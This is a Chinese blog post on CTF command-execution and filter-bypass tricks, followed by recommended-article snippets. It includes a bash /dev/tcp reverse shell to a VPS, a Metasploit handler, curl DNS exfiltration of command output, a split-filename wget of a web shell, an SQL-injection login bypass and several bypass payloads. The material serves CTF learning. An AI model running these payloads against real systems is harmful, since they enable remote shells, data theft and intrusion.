浅谈CTF中命令执行与绕过的小技巧

最新推荐文章于 2023-08-12 17:44:40 发布
最新推荐文章于 2023-08-12 17:44:40 发布
阅读量913 收藏 2
点赞数
分类专栏: 权限绕过


空格绕过

< 符号

浅谈CTF中命令执行与绕过的小技巧

%09 符号需要php环境,这里就不搭建啦,见谅)

$IFS$9 符号${IFS} 符号

浅谈CTF中命令执行与绕过的小技巧

这里解释一下${IFS},$IFS,$IFS$9的区别,首先$IFS在linux下表示分隔符,然而我本地实验却会发生这种情况,这里解释一下,单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

命令分隔符这里介绍5种姿势

%0a符号
换行符
%0d符号
回车符
;符号
在 shell 中,担任”连续指令”功能的符号就是”分号”
&符号

浅谈CTF中命令执行与绕过的小技巧

& 放在启动参数后面表示设置此进程为后台进程,默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个’&’实现这个目的。进程切换到后台的时候,我们把它称为job。切换到后台时会输出相关job信息,这里36210就是该进程的PID
|符号

浅谈CTF中命令执行与绕过的小技巧

管道符左边命令的输出就会作为管道符右边命令的输入,所以左边的输出并不显示

命令终止符

  1. %00
  2. %20 #

(需要php环境,这里就不搭建啦,见谅)

黑名单绕过

a=l;b=s;$a$b

浅谈CTF中命令执行与绕过的小技巧

base64编码

代码6

无回显的命令执行

这里先给一个bugku平台的靶机地址:http://47.93.190.246:49165/

这里第一步先用

  1. username=0' union select 1, md5( 1)#
  2. password= 1

绕过,就可以到命令执行界面然而尝试一下发现没有回显这里有3种方法

第一种是利用bash命令并在本地进行nc监听结果查看回连日志,然后就行

先在vps处用nc进行监听

nc -l -p 8080 -vvv

然后在靶机命令执行处输入

|bash -i >& /dev/tcp/xxxxxI(你的vps的公网ip)/8080 0>&1

浅谈CTF中命令执行与绕过的小技巧浅谈CTF中命令执行与绕过的小技巧

第二种是msf反向回连

同样vps用msf监听

  1. vps的msf监听:
  3. use exploit/multi/ handler
  4. set payload linux/armle/shell/reverse_tcp
  5. set lport 8080
  6. set lhost xxx.xxx.xxx.xxx
  7. set exitonsession false
  8. exploit -j

然后在靶机命令执行处输入

|bash -i >& /dev/tcp/xxxxxI(你的vps的公网ip)/8080 0>&1

即可getflag

第三种是利用DNS管道解析

这里提供一个在线网址,可以直接进行给一个利用网址:admin.dnslog.link注册一个账号后会分配一个子域名可以利用

|curl `whoami`.xxxx.xxx(子域名)

这样就会在利用网址看到反弹结果。(这里也不演示了,账号忘记了。。。)这里解释一下\whoami\因为`反引号在linux下是执行命令的特殊符号,原理请见:http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ

七个字的命令执行

这题是p总在小密圈发表的一篇文章,当时没有做出来,这题是利用重命名文件绕过的,所以可以这样进行调用,因为限制了命令的长度,所以无法直接构造,只能通过文件构造

这里先介绍一下小技巧,linux下创建文件的命令可以用1>1创建文件名为1的空文件

浅谈CTF中命令执行与绕过的小技巧

进一步fuzz发现a>1居然也可以,虽然会报错,但是还是可以创建空文件。

浅谈CTF中命令执行与绕过的小技巧

ls>1可以直接把把ls的内容导入一个文件中,但是会默认追加\n。有了这个基础,我们再来看这道题

  1. <?php
  2. if (strlen($_GET[ 1 ])< 8 ){
  3. echo shell_exec($_GET[ 1 ]);
  4. }
  5. ?>

简单的代码,可以利用

  1. 1> wget\
  2. 1>域名.\
  3. 1> com\
  4. 1> -O\
  5. 1> she\
  6. 1> ll .p\
  7. 1> p
  8. ls> a
  9. sh a

这里注意.不能作为文件名的开头,因为linux下.是隐藏文件的开头,ls列不出来

然而这里还有个问题,就是ls下的文件名是按照字母顺序排序的,所以需要基于时间排序

ls -t>a

网络地址转化为数字地址

网络地址有另外一种表示形式,就是数字地址比如127.0.0.1可以转化为2130706433

可以直接访问

http://2130706433

或者

http://0x7F000001

这样就可以绕过.的ip过滤,这里给个转化网址:http://www.msxindl.com/tools/ip/ip_num.asp

GCTF RCE

这题过滤了很多东西,下面说一下比较重要的

||&|;|%{}| |''|.|

这里给个payload

  1. %0acat%09
  2. %0Acat$IFS$9
  3. %0acat<

用%0a绕过curl然后在从我前面绕过空格的payload中随便挑一个没有过滤的

最后总结一下,做命令执行的题首要的是寻找命令执行的点,然后去猜测他的后台语句是如何构造的,过滤了哪些,还剩哪些可以用,这样一个一个排除,最后大都能找出payload

Mickey_gl
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
浅谈CTF到实战1
08-03
本文主要探讨了从CTF竞赛到实际安全攻防实战之间的差异与挑战,并给出了几个适合CTF爱好者逐步进入实战领域的切入点。 首先,CTF(Capture The Flag)比赛通常涉及的是规模较小的二进制程序,而实战则可能面对...
web安全之命令执行(六)
Delity的博客
07-08 3679
一、命令执行漏洞介绍 命令执行(Command Execution)漏洞即黑客可以直接在Web应用执行系统命令,从而获取敏感信息或者拿下shell权限,可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行,更常见的命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等 二、PHP与命令执行漏洞相关的函数: 1、PHP的5种命令执行函数:system()、exec()、passthru()、shell_exec()、“运算符 eval()函数注入攻击,将
Web1 命令执行(二)
weixin_53896576的博客
01-24 6521
三.常见的系统执行函数 system,shell_exec,exec,popen,passthru 1.system 将 字符串 作为 OS命令 去执⾏,并且 自带输出功能。 system(string $command, int &$return_var = ?): string 利用方式: <?php //a = system('ls') $a = $_REQUEST[a]; eval($a); ?> 2.shell_exec() 通过 shell 环境执⾏命.
linux查看文件命令和空格绕过
m0_56059226的博客
06-18 2284
由于做了[WUSTCTF2020]朴实无华这道题目,整理一下除了cat还可以用哪些命令打开文件 cat由第一行开始显示文件内容 tac从最后一行开始显示,可以看出 tac 是 cat 的倒著写! nl 显示的时候,顺道输出行号! more 一页一页的显示文件内容 less 与 more 类似,但是比 more 更好的是,他可以往前翻页! head 只看头几行 tail 只看尾巴几行 ...
BUUCTF
qq_45694932的博客
09-02 527
BUUCTF GXYCTF2019]Ping Ping Ping 通过测试貌似过滤的空格 $IFS$9 可以代替空格 发现过滤了flag 尝试1.fla*不好使 2 fla/g 不好使 3.fla‘’g 不好使 看到index里有一个变量 $a于是想到用变量拼接
CTF命令执行总结
qq_45927819的博客
11-13 3807
文章目录前言空格绕过命令分割符关键词过滤编码绕过 前言 最近遇到了好多命令执行的web题,这就来总结一下这方面的知识!! 空格绕过 常见的绕过符号有: $IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、> $IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $
PHP命令执行漏洞基础
笑花大王
02-02 2045
前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数,从而随意执行系统命令,这就是命令执行漏洞。 基本函数 1.system()用于执行外部程序,并且显示输出 <?php system('whoami'); ?> 2.exec()函数用于执行一个...
ctfsql注入下的一些小技巧.doc
10-07
"ctfsql注入下的一些小技巧" CTF 的 SQL 注入技巧是指在 Capture The Flag 比赛使用的 SQL 注入技术,以获取 Flags 或者其他敏感信息。以下是 CTF SQL 注入的一些小技巧: 一、注释符 在 MySQL ,有两...
$IFS
vsooda的专栏
06-23 1032
转自:http://bash.cyberciti.biz/guide/$IFS The IFS is a special shell variable.You can change the value of IFS as per your requirments.The Internal Field Separator (IFS) that is used for word splittin
shell的$IFS变量和$*
小龙在线
08-26 4968
IFS表示 Internal Field Separator(内部字段分隔符)
WAF绕过命令执行
Williamanddog的博客
02-06 372
exec() #不输出结果,返回最后一行shell结果,所有结果保存到一个返回数组里。passthru() #只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。popen()、proc_open() #不会直接返回执行结果,而是返回一个文件指针。shell_exec() #通过shell执行命令并以字符串的形式返回完整的输出。system() #输出并返回最后一行shell结果。%a%%b% //正常执行whoami。%a%%b% //正常执行whoami。#在php的ping环境
Linux内部字段分离符环境变量IFS
khx0910的博客
05-22 596
Linux内部字段分离符环境变量IFS:用于bash shell,默认bash shell 会将空格、制表符/t、换行符/n 当成字段分隔符 arr=(/pubsentiment?action=chezhi&site=bbs.12365auto.com&method=inner&id=1&date=&version=1590050449:3h:1:1;/pubsentiment?action=pcauto&site=bbs.pcauto.com.cn&am
CTF命令执行学习笔记
qq_42911487的博客
10-31 3037
CTF命令执行学习笔记 php常见的命令执行函数(这里只谈命令执行不涉及代码执行) system、popen、shell_exec、exec、passthru、反引号(比如echo ls;反引号实际是shell_exec的另一种形式) //通常以以下形式出现,题外话eval可以直接闭合php标签另起一个php... <?php $a=$_GET[1]; //一些过滤 system($a); ?> 命令执行绕过空格 1.$IFS、$IFS$9、$IFS$@、$IFS$*等 在linuxIFS
linux shell bash -c $IFS ${IFS}
qq_29060627的博客
04-30 936
root@out:~# aa='echo${IFS}-e${IFS}-n${IFS}"123\\\n456"' root@out:~# bash -c $aa; 123\n456root@out:~# root@out:~# 如上所示:为什么需要${IFS}? 其实可以不用$IFS,只用把$aa用 双引号 引起来. root@out:~# cc='sleep "1";echo -e "123\n456"'; root@out:~# echo $cc sleep "1";ech...
Web安全之命令执行漏洞
最新发布
qq_42751192的博客
08-12 1281
当 Web 应用需要调用一些执行系统命令的函数时,并且用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令,从而造成命令执行攻击,这就是命令执行漏洞。
dark.x86病毒新变种
gsls200808的专栏
03-09 2046
上一篇博文是伪装成nginx服务,这篇是伪装zyxlel的服务,那么这个漏洞利用的是Zyxel 开发的“zhttpd”网络服务器漏洞没跑了。病毒行为类似https://www.cnblogs.com/wangbingbing/p/15319257.html。将http://163.123.143.126/x.sh下载下来看内容。这个脚本在去年12月有人提交过了,国产杀毒360引擎检出了。依然是来自俄罗斯莫斯科的病毒。从zhttpd看估计猜想可能是下面这三个的越权漏洞。查一下这个x.sh文件有没有人提交过。
CTF挑战:绕过过滤执行命令技巧解析
"ctfshow-web41~60-WP 是一系列关于网络安全竞赛(CTF,Capture The Flag)的Web安全题目,主要涉及命令注入漏洞的利用与绕过技巧。这些题目逐步增加难度,帮助参赛者提升在实战发现和解决安全问题的能力。" 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值